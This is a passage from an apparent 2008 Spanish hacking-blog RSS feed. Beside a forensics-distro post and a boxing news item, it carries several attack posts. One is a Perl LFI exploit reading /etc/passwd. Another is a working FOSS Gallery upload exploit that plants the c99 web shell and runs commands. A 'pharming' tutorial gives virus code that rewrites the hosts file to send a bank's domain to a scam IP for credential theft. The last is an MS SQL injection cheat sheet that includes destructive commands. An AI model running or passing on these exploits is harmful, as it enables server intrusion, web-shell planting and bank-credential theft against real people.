/&gt;use LWP::UserAgent;&lt;br /&gt;use HTTP::Request;&lt;br /&gt;use LWP::Simple;&lt;br /&gt;&lt;br /&gt;if (!$ARGV[0])&lt;br /&gt;{&lt;br /&gt;print "Usage: perl xpl.pl [HOST]\n";&lt;br /&gt;print "Example: perl xpl.pl http://localhost/path/\n";&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$web=$ARGV[0];&lt;br /&gt;chomp $web;&lt;br /&gt;&lt;br /&gt;$iny="vuln.php?vuln=../../../../../../../../../../../../../../../../etc/passwd";&lt;br /&gt;&lt;br /&gt;my $web1=$web.$iny;&lt;br /&gt;print "$web1\n\n";&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;my $req=HTTP::Request-&gt;new(GET=&gt;$web1);&lt;br /&gt;$doc = $ua-&gt;request($req)-&gt;as_string;&lt;br /&gt;&lt;br /&gt;if ($doc=~ /^root/moxis ){&lt;br /&gt;print "Web is vuln\n";&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;print "Web is not vuln\n";&lt;br /&gt;}}&lt;br /&gt;&lt;br /&gt;[ENDcode #1]&lt;br /&gt;&lt;br /&gt;El exploit es simple y no tiene mucho misterio. Hacemos uso del módulo 'LWP' para hacer&lt;br /&gt;nuestra conexión a la web (con la inyección de explotación incluida) y mediante una&lt;br /&gt;expresión regular buscamos que se haya incluido el archivo y si es así lo muestra, en caso&lt;br /&gt;contrario sale un mensaje de error.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------[ 0x03.- Cŕeditos ]&lt;br /&gt;&lt;br /&gt;Author: JosS&lt;br /&gt;mail: sys-project[at]hotmail[dot]com&lt;br /&gt;site: http://spanish-hackers.com&lt;br /&gt;team: Spanish Hackers Team - [SHT]&lt;br /&gt;&lt;br /&gt;work fun!&lt;br /&gt;&lt;br /&gt;__EOF__&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-6888094905229703431?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/JDt1SMwy15o" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-24T09:34:14.550-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/10/fucking-web-apps-lfi-1-attack-edition.html</feedburner:origLink></item><item><title>Helix Live Distro3.0</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/ownYoOIbwUU/helix-live-distro30.html</link><category>linux</category><category>livecd</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Tue, 14 Oct 2008 22:52:36 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-2852006696963604353</guid><description>&lt;div class="inside"&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Helix se encuentra disponible como descarga gratuita una imagen ISO.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; cabe en un 700 CD-R (W).&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Grabar con su CD favorito de escritura de software y, a continuación, arrancar desde el CD o insertarlo en un sistema en funcionamiento.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt; Desde que Helix es libre de lo que se refiere sin ningún tipo de apoyo oficial.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Si usted tiene preguntas leer los cambios y comprobar los foros.&lt;/span&gt; &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;span style="" onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;¿Qué es Helix&lt;/span&gt; &lt;/h2&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Helix es una distribución Basada en Ubuntu Linux. Helix es algo más que un Live CD de arranque.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Todavía puede arrancar un entorno Linux personalizado que incluye kernel de  Linux personalizado, excelente detección de hardware y muchas aplicaciones dedicada a la Respuesta a Incidentes y Forense.&lt;/span&gt; &lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Helix se ha modificado mucho cuidado de no tocar el equipo host en modo alguno, y es forense de sonido.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Helix Wil auto no se montara en el espacio de intercambio, o montar cualquier auto los dispositivos conectados.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Helix también tiene un lado especial en vivo de Respuesta a Incidentes y Forense.&lt;/span&gt; &lt;/p&gt;&lt;p&gt;  &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Helix se centra en la Respuesta a Incidentes y herramientas forenses.&lt;/span&gt; &lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; Está destinada a ser utilizada por personas que tienen una buena comprensión de Respuesta a Incidentes y técnicas forenses.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt; Para Descargar Esta Live Cd Visita El Sitio Oficial o Descargala Desde&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;a href="http://www.e-fense.com/helix/Download.html"&gt;Aqui&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;Para Mas Info:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;a href="http://helix.e-fense.com/"&gt;Aqui&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;Saludos&lt;br /&gt;&lt;/span&gt; &lt;/p&gt;&lt;p&gt;&lt;span onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;/span&gt; &lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-2852006696963604353?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/ownYoOIbwUU" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-14T22:52:36.214-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/10/helix-live-distro30.html</feedburner:origLink></item><item><title>Juan Manuel Lopez OWNEA a Figueroa en el primer asalto</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/ojLz_Dc7KeI/juan-manuel-lopez-ownea-figueroa-en-el.html</link><category>Noticias</category><category>owned</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Sun, 05 Oct 2008 20:36:07 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-6976298432116533676</guid><description>NO tiene que ver nada con la seguridad pero despues de toda la mierda que hablo este tipo salio OWNEADO xdddddd...&lt;br /&gt;&lt;br /&gt;Juan Manuel Lopez noquea a Figueroa en el primer asalto&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/8lQ1kTPkTD0&amp;amp;hl=es&amp;amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/8lQ1kTPkTD0&amp;amp;hl=es&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Juan Manuel Lopez combates de boxeoJuan Manuel López logro vencer por KO en el primer asalto al mexicano César Figueroa, logrando así la primera defensa de su corona mundial supergallo de la OMB e hizo un llamado a Israel "Magnífico" Vázquez para unificar la division.&lt;br /&gt;&lt;br /&gt;En el primer asalto hubo un fuerte intercambio de golpes donde Lopez envio a la lona a Figueroa, el arbitro Roberto Ramírez aplico la cuenta de 10 la cual el mexicano no pudo responder. Lopez retiene la corona que le gano a otro mexicano en Daniel Ponce De León el pasado 7 junio al cual también derroto por KO en el primer asalto.&lt;br /&gt;&lt;br /&gt;La meta es Vázquez, ahora mismo ese es el norte. Posiblemente si la promotora acata los planes de mi grupo pelearé ante Vásquez el otro año", agrego López en su vestidor momentos antes de su pelea contra Figueroa.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-6976298432116533676?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/ojLz_Dc7KeI" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-05T20:36:07.811-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><enclosure url="http://www.youtube.com/v/8lQ1kTPkTD0&amp;amp;hl=es&amp;amp;fs=1" length="763" type="application/x-shockwave-flash" /><feedburner:origLink>http://h4xxor.blogspot.com/2008/10/juan-manuel-lopez-ownea-figueroa-en-el.html</feedburner:origLink></item><item><title>FOSS Gallery Public &lt;= 1.0 Arbitrary Upload / Information c99 Expoit  by JosS</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/DS-Epc8EM1E/foss-gallery-public-10-arbitrary-upload.html</link><category>Advisories</category><category>exploits</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Sun, 05 Oct 2008 14:45:46 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-4634859270681939448</guid><description>Read Source:&lt;br /&gt;&lt;br /&gt;Código:&lt;br /&gt;&lt;br /&gt;# FOSS Gallery Public &lt;= 1.0 Arbitrary Upload / Information c99 Expoit&lt;br /&gt;# url: http://downloads.sourceforge.net/fossgallery/&lt;br /&gt;#&lt;br /&gt;# Author: JosS&lt;br /&gt;# mail: sys-project[at]hotmail[dot]com&lt;br /&gt;# site: http://spanish-hackers.com&lt;br /&gt;# team: Spanish Hackers Team - [SHT]&lt;br /&gt;#&lt;br /&gt;# This was written for educational purpose. Use it at your own risk.&lt;br /&gt;# Author will be not responsible for any damage.&lt;br /&gt;#&lt;br /&gt;# OUTPUT:&lt;br /&gt;#&lt;br /&gt;# Exploited sucessfully.&lt;br /&gt;#&lt;br /&gt;# [+] Info:&lt;br /&gt;#    Linux h4x0rz 2.6.18-6-686 #1 SMP Mon Aug 18 08:42:39 UTC 2008 i686&lt;br /&gt;#    uid=33(www-data) gid=33(www-data) groups=33(www-data)&lt;br /&gt;#    Safe Mode: OFF (not secure)&lt;br /&gt;#&lt;br /&gt;# joss@h4x0rz:~/Desktop$&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use HTTP::Request::Common;&lt;br /&gt;use HTTP::Headers;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use HTTP::Request;&lt;br /&gt;use LWP::Simple;&lt;br /&gt;&lt;br /&gt;sub lw&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;my $SO = $^O;&lt;br /&gt;my $linux = "";&lt;br /&gt;if (index(lc($SO),"win")!=-1){&lt;br /&gt;     $linux="0";&lt;br /&gt;     }else{&lt;br /&gt;      $linux="1";&lt;br /&gt;     }&lt;br /&gt;  if($linux){&lt;br /&gt;system("clear");&lt;br /&gt;}&lt;br /&gt;else{&lt;br /&gt;system("cls");&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;my ($host, $file) = @ARGV ;&lt;br /&gt;&lt;br /&gt;if (!$ARGV[0]) {&lt;br /&gt;&lt;br /&gt;&amp;lw;&lt;br /&gt;print "\n[x] FOSS Gallery Public &lt;= 1.0 Arbitrary Upload / Information c99 Expoit\n";&lt;br /&gt;print "[x] written by JosS - sys-project[at]hotmail.com\n";&lt;br /&gt;print "[x] http://www.spanish-hackers.com/\n\n";&lt;br /&gt;print "Usage: $0 [host] [file] \n";&lt;br /&gt;print "if doesn't exist the file: file default is phpshell C99\n\n";&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;if (!$ARGV[1])&lt;br /&gt;{&lt;br /&gt;$file="c99.php";&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&amp;lw;&lt;br /&gt;&lt;br /&gt;$host = 'http://'.$host if ($host !~ /^http:/);&lt;br /&gt;$host .= "/" if ($host !~ /\/\$/);&lt;br /&gt;&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new();&lt;br /&gt;$ua-&gt;timeout(12);&lt;br /&gt;my $request = HTTP::Request-&gt;new();&lt;br /&gt;my $response;&lt;br /&gt;my $header;&lt;br /&gt;my $url = $host."processFiles.php";&lt;br /&gt;&lt;br /&gt;$response = $ua-&gt;request(POST $url, Content_Type =&gt; 'form-data',&lt;br /&gt;     Content =&gt; [ uploadNeed =&gt; "1", uploadFile0 =&gt; [$file]]);&lt;br /&gt;$content = $response-&gt;content;&lt;br /&gt;&lt;br /&gt;if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; }&lt;br /&gt;else { print "\nExploit failed\n"; exit;}&lt;br /&gt;&lt;br /&gt;my $c99="c99.php";&lt;br /&gt;chomp ($c99);&lt;br /&gt;&lt;br /&gt;if ($file =~ /c99.php/)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;$comando="?act=cmd&amp;amp;d=/&amp;amp;cmd=/&amp;amp;cmd_txt=1&amp;amp;submit=Execute";&lt;br /&gt;&lt;br /&gt;print "\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;my $final = $host.$c99.$comando;&lt;br /&gt;&lt;br /&gt;my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;&lt;br /&gt;my $req = HTTP::Request-&gt;new(GET =&gt; $final);&lt;br /&gt;&lt;br /&gt;$ua-&gt;timeout(10);&lt;br /&gt;&lt;br /&gt;$doc = $ua-&gt;request($req)-&gt;as_string;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$kernel = $1 if ( $doc =~ m/-a:  (.*?)\&lt;\/b&gt;/mosix);&lt;br /&gt;$id = $1 if ( $doc =~ m/&lt;*b&gt;uid (.*?)\&lt;\/b&gt;/mosix);&lt;br /&gt;&lt;br /&gt;$safe = $1 if ( $doc =~ m/color=green&gt; (.*?)\&lt;\/font&gt;/mosix);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;print "[+] Info:\n";&lt;br /&gt;&lt;br /&gt;print "    $kernel\n";&lt;br /&gt;print "    uid$id\n";&lt;br /&gt;&lt;br /&gt;print "    Safe Mode: $safe\n";&lt;br /&gt;&lt;br /&gt;print "\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;EOF&lt;br /&gt;############################################333&lt;br /&gt;&lt;br /&gt;con Proteccion Anti Script Kiddies xD ............&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;saludos&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-4634859270681939448?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/DS-Epc8EM1E" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-05T14:45:46.310-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/10/foss-gallery-public-10-arbitrary-upload.html</feedburner:origLink></item><item><title>Pharming Basics  by JosS</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/sFlMHIGLKDA/pharming-basics-by-joss.html</link><category>manuales</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Wed, 01 Oct 2008 19:39:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-5898355065322427672</guid><description>&lt;pre&gt;print "\t\t########################################################\n\n";&lt;br /&gt;print "\t\t#          Pharming.txt - Spanish Hackers Team         #\n\n";&lt;br /&gt;print "\t\t#                    by JosS                           #\n\n";&lt;br /&gt;print "\t\t########################################################\n\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##Pharming.&lt;br /&gt;&lt;br /&gt;Hola a todos!.&lt;br /&gt;&lt;br /&gt;Hoy [21-9-07] me gustaría hablarles del pharming, principalmente de su uso y abuso.&lt;br /&gt;Es una vulnerabilidad que reside en los servidores DNS, aquellos servidores que&lt;br /&gt;transforman URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son&lt;br /&gt;fines no legales, como puede ser el Phising, una de las prioridades de esta vuln.&lt;br /&gt;&lt;br /&gt;Más que nada quiero enfocar este manual al uso práctico de virus creados para el robo&lt;br /&gt;de credenciales.&lt;br /&gt;&lt;br /&gt;##Hosts.&lt;br /&gt;&lt;br /&gt;En todos los sistemas operativos, ya sean de particulares o empresas&lt;br /&gt;poseen un archivo llamado 'hosts' en el se encuentran las URLs y las IPs a las que se&lt;br /&gt;dirigen.&lt;br /&gt;Si nosotros podemos escribir en ese archivo 'hosts' podríamos hacer que al entrar a&lt;br /&gt;google.com fuera a www.zone-h.org. Veamos un ejemplo:&lt;br /&gt;&lt;br /&gt;127.0.0.1 localhost&lt;br /&gt;&lt;br /&gt;Esto quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que cuando&lt;br /&gt;ponemos localhost en nuestro navegador nos dirigimos a nuestra máquina.&lt;br /&gt;&lt;br /&gt;##Rutas.&lt;br /&gt;&lt;br /&gt;# Windows 95/98/Me: C:\Windows\Hosts&lt;br /&gt;# Windows NT/2000: C:\WINNT\System32\drivers\etc&lt;br /&gt;# Windows XP: C:\WINDOWS\system32\drivers\etc&lt;br /&gt;# Windows 2003: C:\WINDOWS\system32\drivers\etc&lt;br /&gt;# Windows Vista: C:\WINDOWS\system32\drivers\etc&lt;br /&gt;# Unix (en general): /etc/hosts&lt;br /&gt;# Linux (en general): /etc/hosts&lt;br /&gt;# MacOS (en general): /etc/hosts&lt;br /&gt;&lt;br /&gt;En esos directorios se encuetra un archivo llamado 'hosts'. El cual podemos modificar a&lt;br /&gt;nuestro gusto.&lt;br /&gt;&lt;br /&gt;##Code.&lt;br /&gt;&lt;br /&gt;Si queremos crear un virus dedicado al robo de credenciales bancarias el uso de la técnica&lt;br /&gt;Pharming nos dará muchos resultados.&lt;br /&gt;Imaginemos que tenemos un Scam del 'Banco BBVA' en la IP = 85.235.65.99 y qeremos que la&lt;br /&gt;víctima que a sido infectada por el virus al entrar a la web oficial del 'Banco BBVA',&lt;br /&gt;redireccione a nuestro Scam. Para eso haríamos esto:&lt;br /&gt;&lt;br /&gt;85.235.65.99 bbva.es&lt;br /&gt;&lt;br /&gt;La programación del virus:&lt;br /&gt;&lt;br /&gt;my $mensaje = "85.235.65.99 bbva.es";&lt;br /&gt;&lt;br /&gt;$dir = ' C:\WINDOWS\system32\drivers\etc\hosts ';&lt;br /&gt;&lt;br /&gt;open (HOSTS, "&gt;&gt;$dir");&lt;br /&gt;&lt;br /&gt;print HOSTS $mensaje;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;print "\t\t########################################################\n\n";&lt;br /&gt;print "\t\t#          Pharming.txt - Spanish Hackers Team          #\n\n";&lt;br /&gt;print "\t\t#                    by JosS                           #\n\n";&lt;br /&gt;print "\t\t########################################################\n\n";&lt;br /&gt;&lt;br /&gt;# spanish-hackers.com&lt;br /&gt;&lt;br /&gt;Source:&lt;br /&gt;&lt;a href="http://www.spanish-hackers.com"&gt;Spanish Hackers Team&lt;/a&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-5898355065322427672?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/sFlMHIGLKDA" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2008-10-01T19:39:00.391-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2008/10/pharming-basics-by-joss.html</feedburner:origLink></item><item><title>MS SQL Injecting (TSQL commands) By JosS</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/ZQItm0T1M-w/ms-sql-injecting-tsql-commands-by-joss.html</link><category>manuales</category><category>papers</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Thu, 25 Sep 2008 01:04:03 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-4458891539603498450</guid><description>Source: http://www.www.spanish-hackers.com&lt;br /&gt;&lt;blockquote&gt;-[ INFO ]---------------------------------------------------------------------&lt;br /&gt;            Title: MS SQL Injecting (TSQL commands)&lt;br /&gt;            Author: JosS&lt;br /&gt;            contact: sys-project[!]hotmail.com&lt;br /&gt;            site: http://spanish-hackers.com/&lt;br /&gt;&lt;br /&gt;            Spanish Hackers Team - [SHT]&lt;br /&gt;            EspSeC &amp; Hack0wn!&lt;br /&gt;            from spain&lt;br /&gt;&lt;br /&gt;            * Spanish version -//&lt;br /&gt;&lt;br /&gt;-[ INDEX ]---------------------------------------------------------------------&lt;br /&gt;            0x01: Introducción&lt;br /&gt;            0x02: Comandos&lt;br /&gt;            0x03: Caracteres&lt;br /&gt;            0x04: Variables&lt;br /&gt;            0x05: Tablas&lt;br /&gt;            0x06: Procedimientos&lt;br /&gt;            0x07: Exploits (hacking)&lt;br /&gt;&lt;br /&gt;            0x08: JosS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x01: Introducción ]--- #######&lt;br /&gt;&lt;br /&gt;Los ataques de SQL Injection nos permiten diferentes puntos y modos de&lt;br /&gt;ataque dependiendo del gestor de Base de Datos que se utilice, cada gestor&lt;br /&gt;tiene sus propias características y lenguaje (Estructured Query language). &lt;br /&gt;En este texto nos vamos a centrar en el gestor de base de datos de &lt;br /&gt;'Microsoft' (MS SQL), el cual utiliza su propio lenguaje, llamado TSQL (Transact sql). &lt;br /&gt;El motivo de elegir este objetivo como partida de nuestros ataques es por la poca &lt;br /&gt;documentación que se encuentra sobre la explotación de esta.&lt;br /&gt;&lt;br /&gt;He hay la cuestión.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x02: Comandos ]--- #######&lt;br /&gt;&lt;br /&gt;- Determina la base de datos sobre la que se realizará la consulta.&lt;br /&gt;    use 'x'&lt;br /&gt;    use master select * from sysobjects&lt;br /&gt;&lt;br /&gt;- Selección de los campos separados por comas dentro de la tabla seleccionada.&lt;br /&gt;    select 'x'&lt;br /&gt;    select username, password from users&lt;br /&gt;&lt;br /&gt;- Carácter comodín.&lt;br /&gt;    *&lt;br /&gt;    select * from users&lt;br /&gt;&lt;br /&gt;- Selección de tablas separadas por comas.&lt;br /&gt;    from 'x'&lt;br /&gt;    select * from tabla1,tabla2&lt;br /&gt;&lt;br /&gt;- Determina una condición a cumplir.&lt;br /&gt;    where 'x'&lt;br /&gt;    select username,password from users where id=0 or id=1&lt;br /&gt;&lt;br /&gt;- Permite ordenar los registros por las columnas deseadas.&lt;br /&gt;    order by 'x'&lt;br /&gt;    select username, password from users order by username Desc&lt;br /&gt;&lt;br /&gt;- Permite realizar agrupaciones de registros.&lt;br /&gt;    group by 'x'&lt;br /&gt;    select count(rol) as cuenta, rol from usuarios group by rol&lt;br /&gt;&lt;br /&gt;- Une dos sentencias sql en una sola.&lt;br /&gt;    union&lt;br /&gt;    select * from users union select * from users2&lt;br /&gt;&lt;br /&gt;- Devuelve todos los campos de las tablas.&lt;br /&gt;    all&lt;br /&gt;    select * from users union all select * from users2&lt;br /&gt;&lt;br /&gt;- Devuelve un determinado número de registros de la tabla.&lt;br /&gt;    top&lt;br /&gt;    select top 1 from users&lt;br /&gt;&lt;br /&gt;- Permite borrar registros, archivos, etc.&lt;br /&gt;    delete&lt;br /&gt;    delete from users&lt;br /&gt;&lt;br /&gt;- Quita todas las filas de una tabla sin registrar las eliminaciones.&lt;br /&gt;    truncate&lt;br /&gt;    truncate users&lt;br /&gt;&lt;br /&gt;- Modifica valores de una tabla.&lt;br /&gt;    update&lt;br /&gt;    update users set pass='xxx'&lt;br /&gt;&lt;br /&gt;- Inserta valores en una tabla.&lt;br /&gt;    insert&lt;br /&gt;    insert into users values ('joss',null)&lt;br /&gt;&lt;br /&gt;- Permite crear objetos en la BD.&lt;br /&gt;    create&lt;br /&gt;&lt;br /&gt;- Permite destruir objetos en la BD.&lt;br /&gt;    drop&lt;br /&gt;&lt;br /&gt;- Permite modificar objetos en la BD.&lt;br /&gt;    alter&lt;br /&gt;&lt;br /&gt;- Termina un proceso de usuario basado en el Id.&lt;br /&gt;    kill 'x'&lt;br /&gt;    kill 53&lt;br /&gt;&lt;br /&gt;- Convierte las expresiones en otros tipos de datos.&lt;br /&gt;    cast&lt;br /&gt;    cast (expresión AS tipo de datos)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x03: Caracteres ]--- #######&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Delimitador de consultas para lanzar la sentencia actual.&lt;br /&gt;    ;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Delimitador de cadenas de datos de caracteres y fechas.&lt;br /&gt;    '&lt;br /&gt;&lt;br /&gt;- Delimitador de comentarios.&lt;br /&gt;    --&lt;br /&gt;    select * from users-- esto no lo ejecuta&lt;br /&gt;&lt;br /&gt;- delimitador de comentarios.&lt;br /&gt;    /*'x'*/&lt;br /&gt;    select * from users/* esto no lo ejecuta*/&lt;br /&gt;&lt;br /&gt;- Da inicio al nombre de procedimientos almacenados.&lt;br /&gt;    xp_sp_&lt;br /&gt;&lt;br /&gt;- Llamada a un procedimiento almacenado o función.&lt;br /&gt;    exec&lt;br /&gt;    execute&lt;br /&gt;&lt;br /&gt;- Carácter de concatenación&lt;br /&gt;    +&lt;br /&gt;    select+username+from+users&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x04: Variables ]--- #######&lt;br /&gt;&lt;br /&gt;- Fecha y hora actuales.&lt;br /&gt;    current_timestamp&lt;br /&gt;&lt;br /&gt;- Nombre de usuario de la BD que realiza la inserción.&lt;br /&gt;    current_user&lt;br /&gt;&lt;br /&gt;- Nombre de usuario de sesión que realiza la inserción.&lt;br /&gt;    session_user&lt;br /&gt;&lt;br /&gt;- Nombre de usuario de sistema que realiza la inserción.&lt;br /&gt;    system_user&lt;br /&gt;&lt;br /&gt;- 0 si la instrucción TSQL anterior no encontró errores.&lt;br /&gt;    @@error&lt;br /&gt;&lt;br /&gt;- Número de transacciones activas de la conexión.&lt;br /&gt;    @@tracount&lt;br /&gt;&lt;br /&gt;- Id de la estación de trabajo.&lt;br /&gt;    host_id&lt;br /&gt;&lt;br /&gt;- Nombre de la estación de trabajo.&lt;br /&gt;    host_name&lt;br /&gt;&lt;br /&gt;- Nos da las estadísticas de entrada y salida de los archivos de BD.&lt;br /&gt;    fn_virtualfilestats&lt;br /&gt;    select * from :: fn_virtualfilestats(1,1)&lt;br /&gt;&lt;br /&gt;- Información de los archivos de las distintas Base de Datos.&lt;br /&gt;    sys.master_files&lt;br /&gt;&lt;br /&gt;- Contiene los nombres de las unidades compartidas por el servidor.&lt;br /&gt;    fn_servershareddrives&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;####### ---[ 0x05: Tablas ]--- #######&lt;br /&gt;&lt;br /&gt;- syscolumns, almacena las columnas de cada tabla con sus propiedades.&lt;br /&gt;- sysdepends, almacena las dependencias de unos objetos con otros en la BD.&lt;br /&gt;- sysfilegroups, asocia los grupos ficheros (mdf, ldf, etc) de la BD a los 